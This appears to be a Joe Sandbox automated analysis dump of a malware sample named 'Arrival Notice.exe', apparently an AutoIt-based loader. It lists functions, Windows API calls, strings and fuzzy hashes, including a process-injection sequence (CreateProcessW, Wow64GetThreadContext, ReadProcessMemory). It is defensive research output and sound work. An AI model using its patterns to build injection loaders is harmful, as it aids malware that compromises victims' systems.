Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 0041039B
LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
LoadIconW.USER32(?,00000063), ref: 004103C0
LoadIconW.USER32(?,000000A4), ref: 004103D3
LoadIconW.USER32(?,000000A2), ref: 004103E6
LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
RegisterClassExW.USER32(?), ref: 0041045D

Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AD0E00,000000FF,00000000), ref: 00410552

Strings

AutoIt v3, xrefs: 00410449
#, xrefs: 00410433
0, xrefs: 0041042C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98

Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON

Download Yara Rule

Strings

Default, xrefs: 0042B31E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _malloc
String ID: Default
API String ID: 1579825452-753088835
Opcode ID: 8862e6c835510d4615abaaf8b267028e04c562e228266a0e05f43dc76da4e5e3
Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
Opcode Fuzzy Hash: 8862e6c835510d4615abaaf8b267028e04c562e228266a0e05f43dc76da4e5e3
Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strcat.LIBCMT ref: 0040F5F3
_memmove.LIBCMT ref: 0040F602
__fread_nolock.LIBCMT ref: 0040F628
_fseek.LIBCMT ref: 0040F674

Strings

AU3!, xrefs: 0040F5ED
EA06, xrefs: 00425D46

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __fread_nolock_fseek_memmove_strcat
String ID: AU3!$EA06
API String ID: 1268643489-2658333250
Opcode ID: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
Opcode Fuzzy Hash: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
KillTimer.USER32(?,00000001,?), ref: 004011B9
PostQuitMessage.USER32(00000000), ref: 004011CB
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
CreatePopupMenu.USER32 ref: 00401204

Strings

TaskbarCreated, xrefs: 004011EB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 004115F1

Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600

std::exception::exception.LIBCMT ref: 00411626
std::exception::exception.LIBCMT ref: 00411640
__CxxThrowException@8.LIBCMT ref: 00411651

Strings

4*H, xrefs: 0041161F
@fI, xrefs: 00411604
,*H, xrefs: 00411609

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: ,*H$4*H$@fI
API String ID: 615853336-1459471987
Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

Function 03C62628 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03C626F9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03C6291F

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 6cec3eb6e18beff05fbbfe2d43af1bd7a1e10cd0536c811458d376741005ea1a
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 61A10776E00209EBDB14CFA4C894BEEB7B5BF48304F248599E615FB280D7799A81CF54

Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
_wcsncpy.LIBCMT ref: 004102ED
SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
_wcsncpy.LIBCMT ref: 00410340

Strings

C:\Users\user\Desktop\Arrival Notice.exe, xrefs: 004102EB, 0041033F, 00425E02, 00425E03

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcsncpy$DesktopFolderFromListMallocPath
String ID: C:\Users\user\Desktop\Arrival Notice.exe
API String ID: 3170942423-3276353992
Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E

Strings

Include, xrefs: 0042719E, 004271E7
Software\AutoIt v3\AutoIt, xrefs: 0040E4D3

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
ShowWindow.USER32(?,00000000), ref: 004105E4
ShowWindow.USER32(?,00000000), ref: 004105EE

Strings

AutoIt v3, xrefs: 00410599, 0041059E
edit, xrefs: 004105C2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

Function 03C623F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03C622E8: Sleep.KERNELBASE(000001F4), ref: 03C622F9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03C6251B

Strings

AMVTC7QVO1LHGQNRSAN9N, xrefs: 03C6257E, 03C62581

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID: CreateFileSleep
String ID: AMVTC7QVO1LHGQNRSAN9N
API String ID: 2694422964-2494346596
Opcode ID: e560aadae89f5ef96e03b81f2adea43ab1a5a1e815f05c084fe6626cb4fd2e52
Instruction ID: cc57a42d7ef0f7558dec6f83d883ded5f49cf374fb5a14e9fec9e854d2f97598
Opcode Fuzzy Hash: e560aadae89f5ef96e03b81f2adea43ab1a5a1e815f05c084fe6626cb4fd2e52
Instruction Fuzzy Hash: 0A51A370D04288DAEF21DBB4C854BEEBBB8AF19304F044599E609FB2C1D7B95B44CB65

Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
RegCloseKey.KERNELBASE(?), ref: 0040F2B5
RegCloseKey.ADVAPI32(?), ref: 0040F2C9

Strings

Control Panel\Mouse, xrefs: 0040F265

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID: Control Panel\Mouse
API String ID: 1607946009-824357125
Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4

Function 03C612E8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03C61AA3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03C61B39
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03C61B5B

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: ac5f57869ceb5b8b818e916200876ed49d8cbb1741cfc53026f01acdff75e2cf
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: 0A620B34A14258DBEB24CFA4C884BDEB376EF58301F1491A9D10DEB390E7769E81CB59

Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004141FA
__flush.LIBCMT ref: 00414218
__write.LIBCMT ref: 0041423F
__flsbuf.LIBCMT ref: 0041426A

Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48

Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786

_free.LIBCMT ref: 004295A0

Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0042933D
C:\Users\user\Desktop\Arrival Notice.exe, xrefs: 0040F578, 0040F57B, 0040F5A5, 0040F5A7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Arrival Notice.exe
API String ID: 3938964917-1323309048
Opcode ID: 5ebbe66f3e0218c8eacee258e06410c6afd984c8e6716a22a3b27948c3320cb7
Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
Opcode Fuzzy Hash: 5ebbe66f3e0218c8eacee258e06410c6afd984c8e6716a22a3b27948c3320cb7
Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8

Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 0042961B

Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Arrival Notice.exe,0040F545,C:\Users\user\Desktop\Arrival Notice.exe,004A90E8,C:\Users\user\Desktop\Arrival Notice.exe,?,0040F545), ref: 0041013C

Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340

Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB

Strings

pWH, xrefs: 004295E7
X, xrefs: 004295E0

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
String ID: X$pWH
API String ID: 85490731-941433119
